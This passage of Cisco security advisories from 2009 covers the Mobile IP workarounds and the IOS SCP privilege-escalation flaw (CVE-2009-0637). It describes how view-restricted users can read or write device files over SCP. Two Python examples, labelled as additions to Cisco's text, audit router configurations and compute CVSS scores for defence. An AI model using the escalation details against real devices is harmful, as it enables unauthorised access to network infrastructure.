| 12.4XF     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.4XG     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XJ     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.4XK     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4XL     | 12.4(15)XL4                          | 12.4(15)XL4   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XM     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.4XN     | Vulnerable; contact TAC              |               |
|------------+--------------------------------------+---------------|
| 12.4XP     | Vulnerable; contact TAC              |               |
|------------+--------------------------------------+---------------|
| 12.4XQ     | 12.4(15)XQ2                          | 12.4(15)XQ2   |
|------------+--------------------------------------+---------------|
| 12.4XR     | 12.4(15)XR4                          | 12.4(22)T1    |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XT     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.4XV     | Vulnerable; contact TAC              |               |
|------------+--------------------------------------+---------------|
| 12.4XW     | 12.4(11)XW10                         | 12.4(11)XW10  |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XY     | 12.4(15)XY4                          | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.4XZ     | 12.4(15)XZ1                          | 12.4(15)XZ2   |
|------------+--------------------------------------+---------------|
| 12.4YA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4YB     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4YD     | Not Vulnerable                       |               |
+-------------------------------------------------------------------+

Workarounds
==========
The following mitigation and identification methods have been
identified for these vulnerabilities:

Infrastructure Access Control Lists
+----------------------------------

Although it is often difficult to block traffic that transits a
network, it is possible to identify traffic that should never be
allowed to target infrastructure devices and block that traffic at
the border of networks. Infrastructure Access Control Lists (iACLs)
are a network security best practice and should be considered as a
long-term addition to good network security as well as a workaround
for these specific vulnerabilities. The iACL example below should be
included as part of the deployed infrastructure access-list which
will protect all devices with IP addresses in the infrastructure IP
address range:

IPv4 example:


    !--- Anti-spoofing entries are shown here.

    !--- Deny special-use address sources.
    !--- Refer to RFC 3330 for additional special use addresses.

    access-list 110 deny ip host 0.0.0.0 any
    access-list 110 deny ip 127.0.0.0 0.255.255.255 any
    access-list 110 deny ip 192.0.2.0 0.0.0.255 any
    access-list 110 deny ip 224.0.0.0 31.255.255.255 any

    !--- Filter RFC 1918 space.

    access-list 110 deny ip 10.0.0.0 0.255.255.255 any
    access-list 110 deny ip 172.16.0.0 0.15.255.255 any
    access-list 110 deny ip 192.168.0.0 0.0.255.255 any

    !--- Deny your space as source from entering your AS.
    !--- Deploy only at the AS edge.

    access-list 110 deny ip YOUR_CIDR_BLOCK any

    !--- Permit BGP.

    access-list 110 permit tcp host bgp_peer host router_ip eq bgp
    access-list 110 permit tcp host bgp_peer eq bgp host router_ip

    !--- Deny access to internal infrastructure addresses.

    access-list 110 deny ip any INTERNAL_INFRASTRUCTURE_ADDRESSES

    !--- Permit transit traffic.

    access-list 110 permit ip any any

IPv6 example:


    !--- Configure the access-list.

    ipv6 access-list iacl

    !--- Deny your space as source from entering your AS.
    !--- Deploy only at the AS edge.

    deny ipv6 YOUR_CIDR_BLOCK_IPV6 any

    !--- Permit multiprotocol BGP.

    permit tcp host bgp_peer_ipv6 host router_ipv6 eq bgp
    permit tcp host bgp_peer_ipv6 eq bgp host router_ipv6

    !--- Deny access to internal infrastructure addresses.

    deny ipv6 any INTERNAL_INFRASTRUCTURE_ADDRESSES_IPV6

    !--- Permit transit traffic.

    permit ipv6 any any

The white paper entitled "Protecting Your Core: Infrastructure
Protection Access Control Lists" presents guidelines and recommended
deployment techniques for infrastructure protection access lists.
This white paper can be obtained at the following link 
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801a1a55.shtml

Cisco IOS Embedded Event Manager
+-------------------------------

It is possible to detect blocked interface queues with a Cisco IOS
Embedded Event Manager (EEM) policy. EEM provides event detection and
reaction capabilities on a Cisco IOS device. EEM can alert
administrators of blocked interfaces with email, a syslog message, or
a Simple Network Management Protocol (SNMP) trap.

A sample EEM policy that uses syslog to alert administrators of
blocked interfaces is available at Cisco Beyond, an online community
dedicated to EEM. A sample script is available at the following link:

http://forums.cisco.com/eforum/servlet/EEM?page�m&fn=script&scriptId�1

More information about EEM is available from Cisco.com at the
following link: 
http://www.cisco.com/en/US/products/ps6815/products_ios_protocol_group_home.html

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at 
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at 
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action regarding this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase directly from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various 
languages.

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was reported to Cisco by a customer.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+-----------------------------------------------------+
| Revision 1.0 | 2009-Mar-25 | Initial public release |
+-----------------------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt

From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco IOS Software Secure Copy Privilege Escalation Vulnerability
Date: Wed, 25 Mar 2009 17:00:00 +0100

Cisco Security Advisory: Cisco IOS Software Secure Copy Privilege
Escalation Vulnerability

Advisory ID: cisco-sa-20090325-scp

http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml

Revision 1.0

For Public Release 2009 March 25 1600 UTC (GMT)

---------------------------------------------------------------------

Summary
======
The server side of the Secure Copy (SCP) implementation in Cisco IOS
software contains a vulnerability that could allow authenticated
users with an attached command-line interface (CLI) view to transfer
files to and from a Cisco IOS device that is configured to be an SCP
server, regardless of what users are authorized to do, per the CLI
view configuration. This vulnerability could allow valid users to
retrieve or write to any file on the device's file system, including
the device's saved configuration and Cisco IOS image files, even if
the CLI view attached to the user does not allow it. This
configuration file may include passwords or other sensitive
information.

The Cisco IOS SCP server is an optional service that is disabled by
default. CLI views are a fundamental component of the Cisco IOS
Role-Based CLI Access feature, which is also disabled by default.
Devices that are not specifically configured to enable the Cisco IOS
SCP server, or that are configured to use it but do not use
role-based CLI access, are not affected by this vulnerability.

This vulnerability does not apply to the Cisco IOS SCP client
feature.

Cisco has released free software updates that address this
vulnerability.

There are no workarounds available for this vulnerability apart from
disabling either the SCP server or the CLI view feature if these
services are not required by administrators.

This advisory is posted at the following link: 
http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml

Note: The March 25, 2009, Cisco IOS Security Advisory bundled
publication includes eight Security Advisories. All of the advisories
address vulnerabilities in Cisco IOS Software. Each advisory lists
the releases that correct the vulnerability or vulnerabilities in the
advisory. The following table lists releases that correct all Cisco
IOS Software vulnerabilities that have been published in Cisco
Security Advisories on March 25, 2009, or earlier.

http://www.cisco.com/warp/public/707/cisco-sa-20090325-bundle.shtml

Individual publication links are listed below:

  * Cisco IOS cTCP Denial of Service Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml

  * Cisco IOS Software Multiple Features IP Sockets Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-ip.shtml

  * Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml

  * Cisco IOS Software Secure Copy Privilege Escalation Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml

  * Cisco IOS Software Session Initiation Protocol Denial of Service
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-sip.shtml

  * Cisco IOS Software Multiple Features Crafted TCP Sequence
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml

  * Cisco IOS Software Multiple Features Crafted UDP Packet
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-udp.shtml

  * Cisco IOS Software WebVPN and SSLVPN Vulnerabilities
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml

Affected Products
================
Vulnerable Products
+------------------

Cisco devices running an affected Cisco IOS software release,
configured to offer SCP server functionality, and configured to use
role-based CLI access are affected by this issue.

A device running a vulnerable Cisco IOS software release is affected
if its configuration is similar to the following:

    parser view <view name>
     <Definition of the CLI view>
    !
    username <user ID> view <view name> secret <some secret>
    !
    ip scp server enable

In the above configuration snippet, the parser view command defines a
view that specifies what commands users in that view can execute. The
username command defines a local user and attaches, via the view
keyword, the previously defined view to the user. And finally, the ip
scp server enable command enables the Cisco IOS SCP server.

The absence of the username command does not guarantee that the
device's configuration is not affected by this vulnerability because
the name of a CLI view can be supplied by means of an Authentication,
Authorization, and Accounting (AAA) server by using the cli-view-name
attribute.

Note: The CLI view attached to a user can be supplied by an AAA
server. When inspecting a device's configuration to determine whether
it is affected by this vulnerability, it is better to check whether
the SCP service is enabled (ip scp server enable command) and whether
there are any CLI views defined (parser view command).

The Cisco IOS SCP server and role-based CLI access features are
disabled by default.

The SCP server functionality is only available on encryption-capable
images. Encryption-capable images are those that contain either a
"k8" or "k9" in the image name, for example, "C7200-ADVSECURITYK9-M".
Devices that do not run encryption-capable images are not vulnerable.
If a device is running an encryption-capable image, the presence in
the configuration of the ip scp server enable command, the existence
of CLI views (parser view command), and whether there are users
(local or remote) attached to these views will determine if the
device is affected.

To determine the Cisco IOS Software release that is running on a
Cisco product, administrators can log in to the device and issue the
show version command to display the system banner. The system banner
confirms that the device is running Cisco IOS Software by displaying
text similar to "Cisco Internetwork Operating System Software" or
"Cisco IOS Software." The image name displays in parentheses,
followed by "Version" and the Cisco IOS Software release name. Other
Cisco devices do not have the show version command or may provide
different output.

The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.3(26) with an installed image name of
C2500-IS-L:

    Router#show version
    Cisco Internetwork Operating System Software
    IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2008 by cisco Systems, Inc.
    Compiled Mon 17-Mar-08 14:39 by dchih

    !--- output truncated


The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.4(20)T with an installed image name of
C1841-ADVENTERPRISEK9-M:

    Router#show version
    Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2008 by Cisco Systems, Inc.
    Compiled Thu 10-Jul-08 20:25 by prod_rel_team

    !--- output truncated


Additional information about Cisco IOS Software release naming
conventions is available in "White Paper: Cisco IOS Reference Guide"
at the following link: http://www.cisco.com/warp/public/620/1.html
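
The checks described above, as an added example that is not part of
the Cisco advisory: it reads saved "show version" and running-config
text and reports whether the configuration preconditions (k8/k9 image,
ip scp server enable, at least one parser view) are present. The
running-config samples, function names and verdict strings are
constructed for illustration; the release-train check against the
fixed-release table is not covered.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# The image name is the parenthesised token after "Software" in the banner.
IMAGE_RE = re.compile(r"Software \(([^)]+)\)")
# Top-level commands only: running-config sub-commands are indented.
VIEW_RE = re.compile(r"^parser view (\S+)")
USER_VIEW_RE = re.compile(r"^username (\S+)\s+(?:.*?\s)?view (\S+)")


@dataclass
class ScpViewAudit:
    image: Optional[str]
    scp_server: bool = False
    views: List[str] = field(default_factory=list)
    local_view_users: Dict[str, str] = field(default_factory=dict)

    @property
    def crypto_image(self) -> bool:
        # Advisory: the SCP server exists only in images named with k8 or k9.
        return bool(self.image and re.search(r"k[89]", self.image, re.I))

    def verdict(self) -> str:
        # An unknown image (no banner match) is not treated as a safe result.
        if self.image is not None and not self.crypto_image:
            return "image-not-encryption-capable"
        if not self.scp_server:
            return "scp-server-disabled"
        if not self.views:
            return "no-cli-views"
        return "preconditions-present"

    @property
    def check_aaa(self) -> bool:
        # A missing local "username ... view" line does not clear the device:
        # an AAA server can attach the view via the cli-view-name attribute.
        return (self.verdict() == "preconditions-present"
                and not self.local_view_users)


def audit(show_version: str, running_config: str) -> ScpViewAudit:
    m = IMAGE_RE.search(show_version)
    result = ScpViewAudit(image=m.group(1) if m else None)
    for line in running_config.splitlines():
        line = line.rstrip()
        if line == "ip scp server enable":
            result.scp_server = True
        elif (m := VIEW_RE.match(line)):
            result.views.append(m.group(1))
        elif (m := USER_VIEW_RE.match(line)):
            result.local_view_users[m.group(1)] = m.group(2)
    return result


# Banners copied from the advisory's two "show version" examples.
SHOW_VERSION_2500 = """\
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
"""
SHOW_VERSION_K9 = """\
Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
"""

# Constructed running-config samples (host, view and user names are made up).
CONFIG_LOCAL_VIEW = """\
hostname edge-rtr-01
!
parser view NOC
 secret 5 $1$constructed
 commands exec include show version
!
username op1 view NOC secret 5 $1$constructed
!
ip scp server enable
"""
CONFIG_AAA_VIEW = """\
hostname edge-rtr-02
aaa new-model
!
parser view NOC
 secret 5 $1$constructed
 commands exec include show version
!
ip scp server enable
"""

if __name__ == "__main__":
    cases = [("K9 image, local view user", SHOW_VERSION_K9, CONFIG_LOCAL_VIEW),
             ("K9 image, view via AAA only", SHOW_VERSION_K9, CONFIG_AAA_VIEW),
             ("non-crypto image", SHOW_VERSION_2500, CONFIG_LOCAL_VIEW)]
    for label, version, config in cases:
        r = audit(version, config)
        print(f"{label}: {r.verdict()} image={r.image} views={r.views} "
              f"local_users={r.local_view_users} check_aaa={r.check_aaa}")
```

A "preconditions-present" verdict means the device still has to be
compared against the fixed-release table for its release train.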

Cisco IOS XE Software is also affected by this vulnerability.

Products Confirmed Not Vulnerable
+--------------------------------

Cisco devices that do not run Cisco IOS software are not affected.

Cisco IOS devices that do not have the SCP server feature enabled, or
that make use of the feature but do not have the role-based CLI
feature enabled, are not affected.

Cisco IOS XR Software is not affected.

No other Cisco products are currently known to be affected by this
vulnerability.

Details
======
SCP is a protocol similar to the Remote Copy (RCP) protocol, which
allows the transfer of files between systems. The main difference
between SCP and RCP is that in SCP, all aspects of the file transfer
session, including authentication, occur in encrypted form, which
makes SCP a more secure alternative than RCP. SCP relies on the
Secure Shell (SSH) protocol, which uses TCP port 22 by default.

The Role-Based CLI Access feature allows the network administrator to
define "views". Views are sets of operational commands and
configuration capabilities that provide selective or partial access
to Cisco IOS software EXEC and configuration (Config) mode commands.
Views restrict user access to Cisco IOS command-line interface (CLI)
and configuration information; that is, a view can define what
commands are accepted and what configuration information is visible.
For more information about the Role-Based CLI Access feature,
reference 
http://www.cisco.com/en/US/docs/ios/12_3t/12_3t7/feature/guide/gtclivws.html

The server side of the SCP implementation in Cisco IOS software
contains a vulnerability that allows authenticated users with an
attached command-line interface (CLI) view to transfer files to and
from a Cisco IOS device that is configured to be an SCP server,
regardless of what users are authorized to do, per the CLI view
configuration. This vulnerability could allow authenticated users to
retrieve or write to any file on the device's file system, including
the device's saved configuration and Cisco IOS image files. This
configuration file may include passwords or other sensitive
information.

In the affected configuration presented in the Affected Products
section, users confined to a CLI view can elevate their privileges by
using SCP to write to the device's configuration. Note that a view
can be attached to a user when defining the user in the local
database (via the username <user name> view ... command), or by
passing the attribute cli-view-name from an AAA server.

This vulnerability does not allow for authentication bypass; login
credentials are verified and access is only granted if a valid
username and password are provided. This vulnerability may cause
authorization to be bypassed.

This vulnerability is documented in the Cisco Bug ID CSCsv38166 
and has been assigned Common Vulnerabilities and Exposures (CVE) ID
CVE-2009-0637.

Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss

CSCsv38166 - SCP + views (role-based CLI) allows privilege escalation

CVSS Base Score - 9.0

 Access Vector           - Network
 Access Complexity       - Low
 Authentication          - Single
 Confidentiality Impact  - Complete
 Integrity Impact        - Complete
 Availability Impact     - Complete

CVSS Temporal Score - 7.4

 Exploitability          - Functional
 Remediation Level       - Official-Fix
 Report Confidence       - Confirmed
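
How the 9.0 and 7.4 figures above follow from the listed metrics, and
how an environmental score is derived from them, as an added example
that is not part of the Cisco advisory. The equations and weights are
those of the CVSS version 2.0 specification; the environmental inputs
(CR, IR, AR, CDP, TD) are constructed values for a hypothetical
deployment.

```python
from decimal import Decimal as D, ROUND_HALF_UP

# Metric weights from the CVSS v2.0 specification, keyed by the value names
# the advisory uses.
AV = {"Local": D("0.395"), "Adjacent Network": D("0.646"), "Network": D("1.0")}
AC = {"High": D("0.35"), "Medium": D("0.61"), "Low": D("0.71")}
AU = {"Multiple": D("0.45"), "Single": D("0.56"), "None": D("0.704")}
CIA = {"None": D("0"), "Partial": D("0.275"), "Complete": D("0.660")}
EXPL = {"Unproven": D("0.85"), "Proof-of-Concept": D("0.9"),
        "Functional": D("0.95"), "High": D("1.0"), "Not Defined": D("1.0")}
RL = {"Official-Fix": D("0.87"), "Temporary-Fix": D("0.90"),
      "Workaround": D("0.95"), "Unavailable": D("1.0"), "Not Defined": D("1.0")}
RC = {"Unconfirmed": D("0.90"), "Uncorroborated": D("0.95"),
      "Confirmed": D("1.0"), "Not Defined": D("1.0")}
# Environmental weights: security requirements, collateral damage potential,
# target distribution.
REQ = {"Low": D("0.5"), "Medium": D("1.0"), "High": D("1.51"), "Not Defined": D("1.0")}
CDP = {"None": D("0"), "Low": D("0.1"), "Low-Medium": D("0.3"),
       "Medium-High": D("0.4"), "High": D("0.5"), "Not Defined": D("0")}
TD = {"None": D("0"), "Low": D("0.25"), "Medium": D("0.75"),
      "High": D("1.0"), "Not Defined": D("1.0")}


def round1(x):
    """round_to_1_decimal from the specification, done in exact decimals."""
    return x.quantize(D("0.1"), rounding=ROUND_HALF_UP)


def impact(m, env=None):
    c = CIA[m["Confidentiality Impact"]]
    i = CIA[m["Integrity Impact"]]
    a = CIA[m["Availability Impact"]]
    if env is None:
        return D("10.41") * (1 - (1 - c) * (1 - i) * (1 - a))
    # AdjustedImpact: each impact is scaled by its requirement, capped at 10.
    c, i, a = c * REQ[env["CR"]], i * REQ[env["IR"]], a * REQ[env["AR"]]
    return min(D("10"), D("10.41") * (1 - (1 - c) * (1 - i) * (1 - a)))


def base_score(m, env=None):
    imp = impact(m, env)
    exploitability = (20 * AV[m["Access Vector"]] * AC[m["Access Complexity"]]
                      * AU[m["Authentication"]])
    f = D("0") if imp == 0 else D("1.176")
    return round1((D("0.6") * imp + D("0.4") * exploitability - D("1.5")) * f)


def temporal_score(m, env=None):
    return round1(base_score(m, env) * EXPL[m["Exploitability"]]
                  * RL[m["Remediation Level"]] * RC[m["Report Confidence"]])


def environmental_score(m, env):
    # AdjustedTemporal is the temporal score recomputed on AdjustedImpact.
    adjusted = temporal_score(m, env)
    return round1((adjusted + (10 - adjusted) * CDP[env["CDP"]]) * TD[env["TD"]])


# Metrics exactly as listed in the advisory for CSCsv38166.
ADVISORY = {
    "Access Vector": "Network", "Access Complexity": "Low",
    "Authentication": "Single", "Confidentiality Impact": "Complete",
    "Integrity Impact": "Complete", "Availability Impact": "Complete",
    "Exploitability": "Functional", "Remediation Level": "Official-Fix",
    "Report Confidence": "Confirmed",
}

# Constructed environment: high confidentiality and integrity requirements,
# three quarters of the estate matching the affected configuration.
DEPLOYMENT = {"CR": "High", "IR": "High", "AR": "Medium",
              "CDP": "Low-Medium", "TD": "Medium"}

if __name__ == "__main__":
    print("base         ", base_score(ADVISORY))
    print("temporal     ", temporal_score(ADVISORY))
    print("environmental", environmental_score(ADVISORY, DEPLOYMENT))
```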

Impact
=====
Successful exploitation of the vulnerability described in this
advisory may allow valid but unauthorized users to retrieve or write
to any file on the device's file system, including the device's saved
configuration and Cisco IOS image files. This configuration file may
include passwords or other sensitive information.

Software Versions and Fixes
==========================
When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Each row of the Cisco IOS software table (below) names a Cisco IOS
release train. If a given release train is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. The "Recommended
Release" column indicates the releases which have fixes for all the
published vulnerabilities at the time of this Advisory. A device
running a release in the given train that is earlier than the release
in a specific column (less than the First Fixed Release) is known to
be vulnerable. Cisco recommends upgrading to a release equal to or
later than the release in the "Recommended Release" column of the
table.

+-------------------------------------------------------------------+
|   Major    |          Availability of Repaired Releases           |
|  Release   |                                                      |
|------------+------------------------------------------------------|
| Affected   |                                    | Recommended     |
| 12.0-Based | First Fixed Release                | Release         |
| Releases   |                                    |                 |
|-------------------------------------------------------------------|
| There are no affected 12.0 based releases                         |
|-------------------------------------------------------------------|
| Affected   |                                    | Recommended     |
| 12.1-Based | First Fixed Release                | Release         |
| Releases   |                                    |                 |
|-------------------------------------------------------------------|
| There are no affected 12.1 based releases                         |
|-------------------------------------------------------------------|
| Affected   |                                    | Recommended     |
| 12.2-Based | First Fixed Release                | Release         |
| Releases   |                                    |                 |
|------------+------------------------------------+-----------------|
| 12.2       | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2B      | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2BC     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2BW     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2BX     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2BY     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2BZ     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2CX     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2CY     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2CZ     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2DA     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2DD     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2DX     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2EW     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2EWA    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2EX     | Vulnerable; migrate to any release | 12.2(44)SE6     |
|            | in 12.2SEG                         |                 |
|------------+------------------------------------+-----------------|
| 12.2EY     | Vulnerable; first fixed in 12.2SE  | 12.2(44)SE6     |
|------------+------------------------------------+-----------------|
| 12.2EZ     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2FX     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2FY     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2FZ     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
|            |                                    | 12.2(33)SRC4;   |
| 12.2IRA    | Vulnerable; first fixed in 12.2SRC | Available on    |
|            |                                    | 18-MAY-2009     |
|------------+------------------------------------+-----------------|
|            |                                    | 12.2(33)SRC4;   |
| 12.2IRB    | Vulnerable; first fixed in 12.2SRC | Available on    |
|            |                                    | 18-MAY-2009     |
|------------+------------------------------------+-----------------|
| 12.2IXA    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2IXB    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2IXC    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2IXD    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2IXE    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2IXF    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2IXG    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2JA     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2JK     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2MB     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2MC     | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2S      | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SB     | 12.2(33)SB4                        | 12.2(33)SB4     |
|------------+------------------------------------+-----------------|
| 12.2SBC    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SCA    | Vulnerable; first fixed in 12.2SCB | 12.2(33)SCB1    |
|------------+------------------------------------+-----------------|
| 12.2SCB    | 12.2(33)SCB1                       | 12.2(33)SCB1    |
|------------+------------------------------------+-----------------|
|            | 12.2(50)SE                         |                 |
| 12.2SE     |                                    | 12.2(44)SE6     |
|            | 12.2(44)SE6                        |                 |
|------------+------------------------------------+-----------------|
| 12.2SEA    | Not Vulnerable                     |                 |
|------------+------------------------------------+-----------------|
| 12.2SEB    | Not Vulnerable                     |                 |
